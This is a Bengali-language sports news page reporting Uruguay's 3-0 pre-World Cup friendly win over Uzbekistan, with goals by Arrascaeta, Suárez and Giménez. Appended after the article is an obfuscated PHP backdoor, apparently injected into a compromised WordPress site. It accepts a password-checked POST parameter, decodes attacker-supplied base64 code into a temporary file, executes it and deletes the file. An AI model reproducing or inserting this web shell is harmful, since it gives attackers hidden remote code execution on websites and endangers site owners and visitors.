সোমবার, ১৭ই জুন, ২০২৪ খ্রিস্টাব্দ ৩রা আষাঢ়, ১৪৩১ বঙ্গাব্দ

উজেবকিস্তানকে গুঁড়িয়ে উরুগুয়ের দুর্দান্ত জয়

news-image

স্পোর্টস ডেস্ক : রাশিয়া বিশ্বকাপের উন্মাদনা ছড়িয়ে পড়েছে সর্বত্র। মূল আসরে অংশগ্রহণকারী দলগুলো এরইমধ্যে তাদের শেষ সময়ের প্রস্তুতি ম্যাচ শুরু করে দিয়েছে। আর সেই ধারাবাহিকদায় উজেবকিস্তানকে তাদের নিজেদের দর্শকদের সামনে গুঁড়িয়ে দিল উরুগুয়ে। স্বাগতিকদের বিপক্ষে ৩-০ গোলের জয় তুলে নিয়েছে তারা।

বৃহস্পতিবার আন্তর্জাতিক প্রস্তুতিমূলক ম্যাচের ৩১ মিনিটে এদিনসন কাভানি ও লুইস সুয়ারেসের বানিয়ে দেয়া বলে গোলবারের ১৫ মিটার দূর থেকে লক্ষ্যভেদ করেন উরুগুয়ের আরাসকায়েতা। ডান পায়ের ভলিতে আড়াআড়ি শটে দারুণভাবে গোলরক্ষককে পরাস্ত করেন তিনি। এরপর দ্বিতীয়ার্ধের ৫৩ মিনিটে ডি বক্সের ভেতর উজবেকিস্তান ডিফেন্ডার আশুরমাতভের হ্যান্ডবল থেকে পাওয়া পেনাল্টিতে জাতীয় দলের জার্সি গায়ে ৯৯ ম্যাচে নিজের ৫১তম গোল করেন বার্সেলোনার তারকা স্টাইকার লুইস সুয়ারেস। পরে ৭২ মিনিটে হেড থেকে গোল করে ব্যবধান ৩-০ করেন অ্যাটলেটিকো মাদ্রিদ ডিফেন্ডার হোসে মারিয়া গিমেনেস।

গোল শোধ দিতে মরিয়া উজবেকিস্তান আক্রমণ বাড়িয়ে দেয়। এ সময় কমিলভ আক্রমজন লাল কার্ড দেখে মাঠ ছাড়লে ১০ জনের দলে পরিণত হয় স্বাগতিকরা।

এ জাতীয় আরও খবর

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}